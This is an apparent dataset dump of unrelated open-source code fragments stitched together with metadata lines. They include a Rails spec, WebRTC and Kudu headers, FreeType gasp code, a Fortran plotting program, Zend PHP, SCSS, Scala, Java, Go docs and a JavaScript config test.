FactoryBot.create(:member, password: 'mala', password_confirmation: 'mala')
}
context "when sign in as a member" do
before { login_as(member) }
it {
click_on 'Sign Out'
expect(current_path).to be == '/login'
}
end
end
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright 2018 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#ifndef MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#define MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#include <memory>
#include "modules/congestion_controller/bbr/bbr_factory.h"
#include "modules/congestion_controller/bbr/bbr_network_controller.h"
#include "modules/congestion_controller/test/controller_printer.h"
namespace webrtc {
class BbrStatePrinter : public DebugStatePrinter {
public:
BbrStatePrinter();
~BbrStatePrinter() override;
void Attach(bbr::BbrNetworkController*);
bool Attached() const override;
void PrintHeaders(FILE* out) override;
void PrintValues(FILE* out) override;
NetworkControlUpdate GetState(Timestamp at_time) const override;
private:
bbr::BbrNetworkController* controller_ = nullptr;
};
class BbrDebugFactory : public BbrNetworkControllerFactory {
public:
explicit BbrDebugFactory(BbrStatePrinter* printer);
std::unique_ptr<NetworkControllerInterface> Create(
NetworkControllerConfig config) override;
bbr::BbrNetworkController* BbrController();
private:
BbrStatePrinter* printer_;
bbr::BbrNetworkController* controller_ = nullptr;
};
} // namespace webrtc
#endif // MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<appSettings>
<add key="webPages:Enabled" value="false" />
<add key="ViewCache:Enabled" value="false" />
<add key="ViewPath:Value" value="Views" />
<add key="ViewRecursiveDiscovery:Enabled" value="true" />
</appSettings>
</configuration>
|
{
"pile_set_name": "Github"
}
| null | null |
INCLUDE 'VICMAIN_FOR'
SUBROUTINE MAIN44
C PROGRAM QPLOT2
C 10 JUL 95 ...CRS (CRI) MST S/W CONVERSION (VICAR PORTING)
C 22 AUG 85 ...JHR... CONVERTED TO VICAR2, RENAMED QPLOT2
C 22 APR 82 ...JHR... INITIAL RELEASE
C E,QPLOT2,IN,*,,PARAMS
C THIS PROGRAM PLOTS LINES OF DN VS RELATIVE SAMPLE NUMBER.
C A MAXIMUM OF 10 LINES MAY BE PLOTTED ON THE GRAPH
C A MAXIMUM OF 10 DATA SETS MAY BE USED
C ANY LINE DIRECTION MAY BE SPECIFIED
C IF THE LINE DIRECTION IS NOT HORIZONTAL OR VERTICAL
C THE OUTPUT SAMPLE POINTS ARE SPACED THE SAME AS THE X AND Y
C AXES, I.E. IF THE LINE DIRECTION IS 45 DEGREES THE NUMBER OF
C OUTPUT SAMPLES WILL BE THE SQUARE ROOT OF 2 TIMES THE NUMBER
C OF INPUT SAMPLES
C
C * PROCESS IN,SL,SS,EL,ES SPECIFIES THE INPUT NUMBER,
C STARTING LINE, STARTING SAMPLE, ENDING LINE, AND
C ENDING SAMPLE.
C
C
implicit none
EXTERNAL EQUIV
COMMON/C1/ SIZE,displace,RDS,XMIN,XMAX,YMIN,YMAX
& ,XSCLMN,XSCLMX,YSCLMN,YSCLMX,XSCLDT
& ,YSCLDT,XLNGTH,YLNGTH,FORMAT,NORM,NCHAN
& ,xsclset,ysclset
COMMON/C2/ SL,SS,EL,ES,IN,UNIT,ILINE,NLINES
& ,NLI,NSI,NSCHAN,GTYPE,XPAGE,LB,LABTOP
common/files/filename
common/commonheader/headermsg,nheadermsg,iiline,i2line
integer*4 iiline,i2line,nheadermsg(220) !! index into header strings
INTEGER*4 IN(10),SL(10),SS(10),EL(10),ES(10),UNIT(10)
INTEGER*4 GTYPE,TTLTOP,NLI(10),NSI(10),NBI(10)
integer*4 STAT,IPARM(256),TICS
integer*4 i,ii,j,jj,n,icount,idef,iline,ind,isize,psize
integer*4 labtop,lcheck,lx,ly,lb,ni,nlines,np,nschan,ntest
integer*4 ntics,ntitle,ntitx,ntity,nx,ny,nchan,naline
integer*4 plotwid,plotht,ntbl,nplotgpi,nplotout
integer*4 nplotgpi2,nploteps,ntmptbl,charsize,charsteps
integer*4 pttype(20),lntype(20),ptcolorl(20)
REAL*4 RPARM(256),XAXIS(4),YAXIS(4)
REAL*4 XMAX(10),XMIN(10),YMAX(10),YMIN(10)
REAL*4 XSCLMN,XSCLMX,YSCLMN,YSCLMX,XLNGTH,YLNGTH
real*4 displace,rds,size,xpage,xscldt,yscldt
logical*4 XVPTST, NORM, xsclset, ysclset, epsplot, nolabel
character*1 LPARM(1024)
character*4 FORMAT(10),aline
character*8 plotfmt
character*24 tbl,tmptbl
character*30 alinenum
CHARACTER*63 XTTL,YTTL,TTL,CBUF,XTITLE,YTITLE,TITLE
character*63 msg,plotgpi,plotgpi2,ploteps
character*56 headermsg(220) !! Labels * (lines per label+2)
CHARACTER*63 plotout
character*120 filename(10)
c
character*8 ptcolor(20),lncolor(20)
character*4 gpi/'.gpi'/,eps/'.eps'/,asc/'.asc'/
c
character*1 num(5)
character bash
c
data num/'1','2','3','4','5'/
data tmptbl/'tmptbl.'/
data aline/'line'/
C
data pttype/ 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13/
data lntype/ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1/
data ptcolor/'green','purple','magenta','blue','brown',
1 'red','cyan','orange','green','purple',
2 'magenta','blue','brown','red','cyan',
3 'orange','green','purple','magenta','blue'/
data ptcolorl/5,6,7,4,5, 3,4,6,5,6, 7,4,5,3,4, 6,5,6,7,4/
data lncolor/'beige','red','green','cyan','purple',
1 'blue','orange','magenta','beige','red',
2 'green','cyan','purple','blue','orange',
3 'magenta','beige','red','green','cyan'/
c
call xvmessage('qplot2 version 2015-08-19',' ')
bash=achar(92)
C
C SET DEFAULTS AND INITIALIZE
c tbl='tmptbl.x'
c ntbl=index(tbl,' ') - 1
YTITLE = 'DN VALUE'
XTITLE = 'RELATIVE SAMPLE NUMBER'
TITLE = 'IPL LINE PLOT'
C 'PLOTNAME'
epsplot=.false.
nplotgpi = 0
nplotgpi2 = 0
nplotout = 0
nploteps = 0
ntbl = 0
epsplot = .false.
CALL XVPARM ('PLOTFMT',plotfmt,icount,idef,1)
if (plotfmt .eq. 'EPS' .or. plotfmt .eq. 'eps') epsplot = .true.
PLOTOUT= 'qplot.eps'
nplotout=index(plotout,' ') - 1
plotgpi= 'qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
plotgpi2= 'qplot.eps.gpi'
nplotgpi2=index(plotgpi2,' ') - 1
tbl='qplot.asc'
ntbl = index(tbl,' ') - 1
CALL XVPARM('PLOTOUT',cbuf,ICOUNT,IDEF,1)
IF (IDEF .EQ. 0) THEN
if (cbuf .eq. "YES" .or. cbuf .eq."yes") then
c epsplot = .true.
plotout='qplot'
nplotout=index(plotout,' ') - 1
plotgpi=plotout(1:nplotout)//gpi
nplotgpi=index(plotgpi,' ') - 1
plotgpi2=plotout(1:nplotout)//eps//gpi
nplotgpi2=index(plotgpi2,' ') - 1
ploteps=plotout(1:nplotout)//eps
nploteps=index(ploteps,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
tmptbl = tbl(1:ntbl)
c Plotout and nplotout from above
elseif (cbuf .eq. "NONE" .or. cbuf .eq."none") then
c epsplot = .false.
plotgpi='qplot
|
{
"pile_set_name": "Github"
}
| null | null |
<?php
/**
* Zend Framework
*
* LICENSE
*
* This source file is subject to the new BSD license that is bundled
* with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://framework.zend.com/license/new-bsd
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@zend.com so we can send you a copy immediately.
*
* @category Zend
* @package Zend_Gdata
* @subpackage Media
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
* @version $Id: MediaRating.php 20096 2010-01-06 02:05:09Z bkarwin $
*/
/**
* @see Zend_Gdata_Extension
*/
require_once 'Zend/Gdata/Extension.php';
/**
* Represents the media:rating element specific to YouTube.
*
* @category Zend
* @package Zend_Gdata
* @subpackage YouTube
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
*/
class Zend_Gdata_YouTube_Extension_MediaRating extends Zend_Gdata_Extension
{
protected $_rootElement = 'rating';
protected $_rootNamespace = 'media';
/**
* @var string
*/
protected $_scheme = null;
/**
* @var string
*/
protected $_country = null;
/**
* Constructs a new MediaRating element
*
* @param string $text
* @param string $scheme
* @param string $country
*/
public function __construct($text = null, $scheme = null, $country = null)
{
$this->registerAllNamespaces(Zend_Gdata_Media::$namespaces);
parent::__construct();
$this->_scheme = $scheme;
$this->_country = $country;
$this->_text = $text;
}
/**
* Retrieves a DOMElement which corresponds to this element and all
* child properties. This is used to build an entry back into a DOM
* and eventually XML text for sending to the server upon updates, or
* for application storage/persistence.
*
* @param DOMDocument $doc The DOMDocument used to construct DOMElements
* @return DOMElement The DOMElement representing this element and all
* child properties.
*/
public function getDOM($doc = null, $majorVersion = 1, $minorVersion = null)
{
$element = parent::getDOM($doc, $majorVersion, $minorVersion);
if ($this->_scheme !== null) {
$element->setAttribute('scheme', $this->_scheme);
}
if ($this->_country != null) {
$element->setAttribute('country', $this->_country);
}
return $element;
}
/**
* Given a DOMNode representing an attribute, tries to map the data into
* instance members. If no mapping is defined, the name and value are
* stored in an array.
*
* @param DOMNode $attribute The DOMNode attribute needed to be handled
*/
protected function takeAttributeFromDOM($attribute)
{
switch ($attribute->localName) {
case 'scheme':
$this->_scheme = $attribute->nodeValue;
break;
case 'country':
$this->_country = $attribute->nodeValue;
break;
default:
parent::takeAttributeFromDOM($attribute);
}
}
/**
* @return string
*/
public function getScheme()
{
return $this->_scheme;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setScheme($value)
{
$this->_scheme = $value;
return $this;
}
/**
* @return string
*/
public function getCountry()
{
return $this->_country;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setCountry($value)
{
$this->_country = $value;
return $this;
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
/* Update alert message: A new version of {APP NAME} is available. Please update to version {NEW VERSION} now.*/
"A new version of %@ is available. Please update to version %@ now."="نسخه جدید %@ در دسترس است. لطفا همین حالا به نسخه %@ بروزرسانی کنید.";
/* Update alert title */
"Update Available"="بروزرسانی در دسترس";
/* Update alert dismiss button title */
"Next time"="دفعه بعد";
/* Update alert skip button title */
"Skip this version"="رد این نسخه";
/* Update alert skip button title */
"Update"="بروزرسانی";
|
{
"pile_set_name": "Github"
}
| null | null |
// Container widths
//
// Set the container width, and override it for fixed navbars in media queries.
@if $enable-grid-classes {
.container {
@include make-container();
@include make-container-max-widths();
}
}
// Fluid container
//
// Utilizes the mixin meant for fixed width containers, but with 100% width for
// fluid, full width layouts.
@if $enable-grid-classes {
.container-fluid {
@include make-container();
}
}
// Row
//
// Rows contain and clear the floats of your columns.
@if $enable-grid-classes {
.row {
@include make-row();
}
// Remove the negative margin from default .row, then the horizontal padding
// from all immediate children columns (to prevent runaway style inheritance).
.no-gutters {
margin-right: 0;
margin-left: 0;
> .col,
> [class*="col-"] {
padding-right: 0;
padding-left: 0;
}
}
}
// Columns
//
// Common styles for small and large grid columns
@if $enable-grid-classes {
@include make-grid-columns();
}
|
{
"pile_set_name": "Github"
}
| null | null |
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#pragma once
#include <cstdint>
#include <set>
#include <string>
#include "kudu/gutil/ref_counted.h"
#include "kudu/util/locks.h"
#include "kudu/util/status.h"
namespace kudu {
namespace rpc {
// RequestTracker implementation, inspired by:
// "Implementing Linearizability at Large Scale and Low Latency" by Colin Lee et al.
//
// This generates sequence numbers for retriable RPCs and tracks the ongoing ones.
// The main point of this is to enable exactly-once semantics, i.e. making sure that
// an RPC is only executed once, by uniquely identifying each RPC that is sent to
// the server.
//
// Note that the sequence numbers here are differet from RPC 'call ids'. A call id
// uniquely identifies a call _to a server_. All calls have a call id that is
// assigned incrementally. Sequence numbers, on the other hand, uniquely identify
// the RPC operation itself. That is, if an RPC is retried on another server it will
// have a different call id, but the same sequence number.
//
// By keeping track of the RPCs that are in-flight and which ones are completed
// we can determine the first incomplete RPC. When this information is sent
// to the server it can use it to garbage collect RPC results that it might be
// saving for future retries, since it now knows there won't be any.
//
// This class is thread safe.
class RequestTracker : public RefCountedThreadSafe<RequestTracker> {
public:
typedef int64_t SequenceNumber;
static const RequestTracker::SequenceNumber kNoSeqNo;
explicit RequestTracker(std::string client_id);
// Creates a new, unique, sequence number.
// Sequence numbers are assigned in increasing integer order.
// Returns Status::OK() and sets 'seq_no' if it was able to generate a sequence number
// or returns Status::ServiceUnavailable() if too many RPCs are in-flight, in which case
// the caller should try again later.
Status NewSeqNo(SequenceNumber* seq_no);
// Returns the sequence number of the first incomplete RPC.
// If there is no incomplete RPC returns kNoSeqNo.
SequenceNumber FirstIncomplete();
// Marks the rpc with 'seq_no' as completed.
void RpcCompleted(const SequenceNumber& seq_no);
// Returns the client id for this request tracker.
const std::string& client_id() { return client_id_; }
private:
// The client id for this request tracker.
const std::string client_id_;
// Lock that protects all non-const fields.
simple_spinlock lock_;
// The next sequence number.
SequenceNumber next_;
// The (ordered) set of incomplete RPCs.
std::set<SequenceNumber> incomplete_rpcs_;
};
} // namespace rpc
} // namespace kudu
|
{
"pile_set_name": "Github"
}
| null | null |
/***************************************************************************/
/* */
/* ftgasp.c */
/* */
/* Access of TrueType's `gasp' table (body). */
/* */
/* Copyright 2007 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
#include <ft2build.h>
#include FT_GASP_H
#include FT_INTERNAL_TRUETYPE_TYPES_H
FT_EXPORT_DEF( FT_Int )
FT_Get_Gasp( FT_Face face,
FT_UInt ppem )
{
FT_Int result = FT_GASP_NO_TABLE;
if ( face && FT_IS_SFNT( face ) )
{
TT_Face ttface = (TT_Face)face;
if ( ttface->gasp.numRanges > 0 )
{
TT_GaspRange range = ttface->gasp.gaspRanges;
TT_GaspRange range_end = range + ttface->gasp.numRanges;
while ( ppem > range->maxPPEM )
{
range++;
if ( range >= range_end )
goto Exit;
}
result = range->gaspFlag;
/* ensure that we don't have spurious bits */
if ( ttface->gasp.version == 0 )
result &= 3;
}
}
Exit:
return result;
}
/* END */
|
{
"pile_set_name": "Github"
}
| null | null |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package eks provides the client and types for making API
// requests to Amazon Elastic Kubernetes Service.
//
// Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service that
// makes it easy for you to run Kubernetes on AWS without needing to stand up
// or maintain your own Kubernetes control plane. Kubernetes is an open-source
// system for automating the deployment, scaling, and management of containerized
// applications.
//
// Amazon EKS runs up-to-date versions of the open-source Kubernetes software,
// so you can use all the existing plugins and tooling from the Kubernetes community.
// Applications running on Amazon EKS are fully compatible with applications
// running on any standard Kubernetes environment, whether running in on-premises
// data centers or public clouds. This means that you can easily migrate any
// standard Kubernetes application to Amazon EKS without any code modification
// required.
//
// See https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01 for more information on this service.
//
// See eks package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/
//
// Using the Client
//
// To contact Amazon Elastic Kubernetes Service with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Elastic Kubernetes Service client EKS for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/#New
package eks
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright (C) 2016 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.syndesis.server.runtime.swagger;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import io.swagger.v3.core.jackson.ModelResolver;
import io.swagger.v3.core.util.Json;
import io.swagger.v3.oas.models.media.Schema;
import io.syndesis.common.model.Kind;
/**
* We're using {@link Kind#modelName} as value for the {@link Kind} enum values.
* The OpenAPI document generation has no knowledge of that so this
* {@link ModelResolver} sets {@code enum} values to the values of the
* {@code modelName}.
*/
public final class KindModelResolver extends ModelResolver {
private static final List<String> KINDS;
static {
KINDS = Stream.of(Kind.values())
.map(k -> k.modelName)
.collect(Collectors.toList());
}
public KindModelResolver() {
super(Json.mapper());
}
@Override
protected void _addEnumProps(final Class<?> propClass, @SuppressWarnings("rawtypes") final Schema property) {
if (Kind.class.equals(propClass)) {
@SuppressWarnings("unchecked")
final Schema<String> kindProperty = property;
kindProperty.setEnum(KINDS);
} else {
super._addEnumProps(propClass, property);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="UTF-8"?>
<!--
DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
Copyright (c) 1997-2017 Oracle and/or its affiliates. All rights reserved.
The contents of this file are subject to the terms of either the GNU
General Public License Version 2 only ("GPL") or the Common Development
and Distribution License("CDDL") (collectively, the "License"). You
may not use this file except in compliance with the License. You can
obtain a copy of the License at
https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
or packager/legal/LICENSE.txt. See the License for the specific
language governing permissions and limitations under the License.
When distributing the software, include this License Header Notice in each
file and include the License file at packager/legal/LICENSE.txt.
GPL Classpath Exception:
Oracle designates this particular file as subject to the "Classpath"
exception as provided by Oracle in the GPL Version 2 section of the License
file that accompanied this code.
Modifications:
If applicable, add the following below the License Header, with the fields
enclosed by brackets [] replaced by your own identifying information:
"Portions Copyright [year] [name of copyright owner]"
Contributor(s):
If you wish your version of this file to be governed by only the CDDL or
only the GPL Version 2, indicate your decision by adding "[Contributor]
elects to include this software in this distribution under the [CDDL or GPL
Version 2] license." If you don't indicate a single choice of license, a
recipient has the option to distribute your version of this file under
either the CDDL, the GPL Version 2 or to extend the choice of license to
its licensees as provided above. However, if you add GPL Version 2 code
and therefore, elected the GPL Version 2 license, then the option applies
only if the new code is made subject to such option by the copyright
holder.
-->
<web-app version="3.0" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
<context-param>
<param-name>javax.faces.PROJECT_STAGE</param-name>
<param-value>${webapp.projectStage}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.PARTIAL_STATE_SAVING</param-name>
<param-value>${webapp.partialStateSaving}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>${webapp.stateSavingMethod}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.SERIALIZE_SERVER_STATE</param-name>
<param-value>${webapp.serializeServerState}</param-value>
</context-param>
<servlet>
<servlet-name>Faces Servlet</servlet-name>
<servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>Faces Servlet</servlet-name>
<url-pattern>/faces/*</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>faces/index.xhtml</welcome-file>
</welcome-file-list>
</web-app>
|
{
"pile_set_name": "Github"
}
| null | null |
These are the functions which can be called on a minecraft:effects_changed criteria
trigger.
addEffect:
Arguments:
String
Usage:
potion type
Notes:
Adds a PotionEffectData for the provided potion type and returns it so functions can be called on it.
|
{
"pile_set_name": "Github"
}
| null | null |
; RUN: opt -strip -S < %s | FileCheck %s
; PR10286
@main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %FOO), i8* blockaddress(@f, %BAR)]
; CHECK: @main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %2), i8* blockaddress(@f, %3)]
declare void @foo() nounwind
declare void @bar() nounwind
define void @f(i8* %indirect.goto.dest) nounwind uwtable ssp {
entry:
indirectbr i8* %indirect.goto.dest, [label %FOO, label %BAR]
; CHECK: indirectbr i8* %0, [label %2, label %3]
FOO:
call void @foo()
ret void
BAR:
call void @bar()
ret void
}
|
{
"pile_set_name": "Github"
}
| null | null |
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST', eras.Run2_2018)
# minimum of logs
process.MessageLogger = cms.Service("MessageLogger",
statistics = cms.untracked.vstring(),
destinations = cms.untracked.vstring("cout"),
cout = cms.untracked.PSet(
threshold = cms.untracked.string("WARNING")
)
)
# raw data source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring("/store/data/Run2018D/ZeroBias/RAW/v1/000/320/688/00000/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
#fileNames = cms.untracked.vstring("root://eoscms.cern.ch//eos/cms/store/group/phys_pps/sw_test_input/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
inputCommands = cms.untracked.vstring(
'drop *',
'keep FEDRawDataCollection_*_*_*'
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
# raw-to-digi conversion
process.load("EventFilter.CTPPSRawToDigi.ctppsRawToDigi_cff")
# local RP reconstruction chain with standard settings
process.load("RecoPPS.Configuration.recoCTPPS_cff")
# define GT
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, "106X_dataRun2_v26")
# override alignment settings
process.load("CalibPPS.ESProducers.ctppsRPAlignmentCorrectionsDataESSourceXML_cfi")
process.ctppsRPAlignmentCorrectionsDataESSourceXML.RealFiles = cms.vstring(
"RecoPPS/Local/test/re_alignment/align_base.xml"
)
process.esPreferLocalAlignment = cms.ESPrefer("CTPPSRPAlignmentCorrectionsDataESSourceXML", "ctppsRPAlignmentCorrectionsDataESSourceXML")
# track plotter
process.ctppsTrackDistributionPlotter = cms.EDAnalyzer("CTPPSTrackDistributionPlotter",
tagTracks = cms.InputTag("ctppsLocalTrackLiteProducer"),
outputFile = cms.string("output_tracks_base.root")
)
# processing sequences
process.path = cms.Path(
process.ctppsRawToDigi
* process.recoCTPPS
* process.ctppsTrackDistributionPlotter
)
# output configuration
process.output = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("output_base.root"),
outputCommands = cms.untracked.vstring(
"drop *",
'keep CTPPSLocalTrackLites_*_*_*'
)
)
process.outpath = cms.EndPath(process.output)
|
{
"pile_set_name": "Github"
}
| null | null |
#pragma once
#include <ostream>
#include_next <unordered_map>
#include <elle/print-fwd.hh>
namespace std
{
template <typename... Args>
std::ostream&
operator <<(ostream& out,
unordered_map<Args...> const& s)
{
auto const format = is_fixed(out) ? "%s%f: %f" : "%s%s: %s";
out << '{';
auto* sep = "";
for (auto const& e: s)
{
elle::print(out, format, sep, e.first, e.second);
sep = ", ";
}
out << '}';
return out;
}
template <typename... Args>
class keys_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
keys_iterator() = default;
keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
class const_keys_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_keys_iterator() = default;
const_keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
const_keys_iterator<Args...>
iter_keys(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.begin());
}
template <typename... Args>
const_keys_iterator<Args...>
iter_keys_end(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.end());
}
template <typename... Args>
class values_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
values_iterator() = default;
values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
values_iterator<Args...>
iter_values(std::unordered_map<Args...>& c)
{
return values_iterator<Args...>(c.begin());
}
template <typename... Args>
class const_values_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_values_iterator() = default;
const_values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
const_values_iterator<Args...>
iter_values(std::unordered_map<Args...> const& c)
{
return const_values_iterator<Args...>(c.begin());
}
// http://www.open-std.org/JTC1/SC22/wg21/docs/papers/2014/n4161.htm
template <typename... Args, typename Pred>
void erase_if(unordered_map<Args...>& c, Pred pred)
{
for (auto it = begin(c); it != end(c);)
if (pred(*it))
it = c.erase(it);
else
++it;
}
}
// Local Variables:
// mode: c++
// End:
|
{
"pile_set_name": "Github"
}
| null | null |
/* __ *\
** ________ ___ / / ___ Scala API **
** / __/ __// _ | / / / _ | (c) 2002-2011, LAMP/EPFL **
** __\ \/ /__/ __ |/ /__/ __ | http://scala-lang.org/ **
** /____/\___/_/ |_/____/_/ | | **
** |/ **
\* */
// GENERATED CODE: DO NOT EDIT. See scala.Function0 for timestamp.
package scala
/** A tuple of 19 elements; the canonical representation of a [[scala.Product19]].
*
* @constructor Create a new tuple with 19 elements. Note that it is more idiomatic to create a Tuple19 via `(t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, t12, t13, t14, t15, t16, t17, t18, t19)`
* @param _1 Element 1 of this Tuple19
* @param _2 Element 2 of this Tuple19
* @param _3 Element 3 of this Tuple19
* @param _4 Element 4 of this Tuple19
* @param _5 Element 5 of this Tuple19
* @param _6 Element 6 of this Tuple19
* @param _7 Element 7 of this Tuple19
* @param _8 Element 8 of this Tuple19
* @param _9 Element 9 of this Tuple19
* @param _10 Element 10 of this Tuple19
* @param _11 Element 11 of this Tuple19
* @param _12 Element 12 of this Tuple19
* @param _13 Element 13 of this Tuple19
* @param _14 Element 14 of this Tuple19
* @param _15 Element 15 of this Tuple19
* @param _16 Element 16 of this Tuple19
* @param _17 Element 17 of this Tuple19
* @param _18 Element 18 of this Tuple19
* @param _19 Element 19 of this Tuple19
*/
case class Tuple19[+T1, +T2, +T3, +T4, +T5, +T6, +T7, +T8, +T9, +T10, +T11, +T12, +T13, +T14, +T15, +T16, +T17, +T18, +T19](_1: T1, _2: T2, _3: T3, _4: T4, _5: T5, _6: T6, _7: T7, _8: T8, _9: T9, _10: T10, _11: T11, _12: T12, _13: T13, _14: T14, _15: T15, _16: T16, _17: T17, _18: T18, _19: T19)
extends Product19[T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19]
{
override def ToString() = "(" + _1 + "," + _2 + "," + _3 + "," + _4 + "," + _5 + "," + _6 + "," + _7 + "," + _8 + "," + _9 +
"," + _10 + "," + _11 + "," + _12 + "," + _13 + "," + _14 + "," + _15 + "," + _16 + "," + _17 + "," + _18 + "," + _19 + ")"
}
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* Update: 15-5-11
* Editor: qihongye
*/
var fs = require('fs');
var path = require('path');
var fis = require('../lib/fis.js');
var _ = fis.file;
var defaultSettings = (require('../lib/config.js')).DEFALUT_SETTINGS;
var expect = require('chai').expect;
var u = fis.util;
var config = null;
describe('config: config',function(){
beforeEach(function(){
fis.project.setProjectRoot(__dirname);
fis.config.init(defaultSettings);
process.env.NODE_ENV = 'dev';
});
it('set / get', function () {
fis.set('namespace', 'common');
expect(fis.get('namespace')).to.equal('common');
fis.set('obj', {a:'a'});
fis.set('obj.b', 'b');
expect(fis.get('obj')).to.deep.equal({a:'a', b:'b'});
expect(fis.get('obj.c', {c: 'c'})).to.deep.equal({c:'c'});
expect(fis.get('obj.a')).to.equal('a');
expect(fis.get('obj.b')).to.equal('b');
});
it('media', function () {
fis.set('a', 'a');
fis.set('b', 'b');
fis.media('prod').set('a', 'aa');
expect(fis.get('a')).to.equal('a');
expect(fis.media('prod').get('a')).to.equal('aa');
expect(fis.media('prod').get('b')).to.equal('b');
expect(fis.media('prod').get('project.charset')).to.equal('utf8');
});
it('fis.match',function(){
